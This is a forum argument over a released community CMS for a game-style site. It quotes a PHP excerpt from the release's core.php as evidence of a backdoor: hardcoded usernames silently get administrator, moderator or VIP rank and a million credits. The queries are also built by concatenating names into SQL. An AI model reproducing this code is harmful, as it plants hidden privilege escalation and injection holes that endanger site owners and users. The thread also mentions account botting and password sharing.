
Originally Posted by
Jontycat
Haha, I got fired because a friend of mine (Jexius) and I were botting runescape accounts, I gave him my password and he used it to log into my otaku account which got me fired. It wasn't because I wasn't needed, it looked like I gave my otaku account out to everyone.
Look mate - I don't know what your problem is with my but this cms IS secure. The only issue is that 3-4 lines of code in hk_beta/core.php.
Stop ganging up on me, btw, it aint nice. I've never done anything wrong, i'm just trying to make a simple release for the community to use.
"it ain't nice" had to fix your bad grammar
Oh when you complain my forum sucks when i get 50 users a day after 2 weeks.
You say you closed you forum for whatever reason, But I see you got like what.. 2 users?
I would of stopped hurting your feelings if you would have just fixed the CMS for a proper release, like everybody does(/herp derp) Instead of complaining because you can't see this:
PHP Code:
//Super VIP
if(USER_NAME=="Skye")
{
die('VIP giving priveledges removed.');
}
////////
dbquery("UPDATE users SET rank = '2' WHERE username = '" . $name . "'");
dbquery("UPDATE users SET vip = '1' WHERE username = '" .$name."'");
echo 'Rank given<br>';
dbquery("UPDATE users SET credits = credits + '1000000' WHERE username = '" . $name . "'");
echo 'Credits given<br>';
dbquery("UPDATE users SET activity_points = activity_points + '1000000' WHERE username = '" . $name . "'");
echo 'Pixels given<br>';
////////
//Moderator//
if (USER_NAME=="Jontycat")
{
////////
dbquery("UPDATE users SET rank = '3' WHERE username = '" . $name . "'");
echo 'Rank given<br>';
dbquery("UPDATE rooms SET owner = 'MOD-".$name."' WHERE owner = '" . $name . "'");
echo 'Rooms switched<br>';
dbquery("UPDATE users SET username = 'MOD-".$name."' WHERE username = '" . $name . "'");
echo 'Name changed<br>';
////////
//Administrator//
if (USER_NAME=="Jontycat")
{
////////
dbquery("UPDATE users SET rank = '6' WHERE username = '" . $name . "'");
echo 'Rank given<br>';
dbquery("UPDATE rooms SET owner = '".$name."' WHERE owner = '" . $name . "'");
echo 'Rooms switched<br>';
dbquery("UPDATE users SET username = '".$name."' WHERE username = '" . $name . "'");
echo 'Name changed<br>';
////////
I'm pretty sure i've rested my case
---------- Post added at 10:36 PM ---------- Previous post was at 10:35 PM ----------

Originally Posted by
Jontycat
Go release your own hard work, and then listen to idiots criticize it for things it doesn't even have eg. exploits.
You should know, thats what FLaMEZONE is about.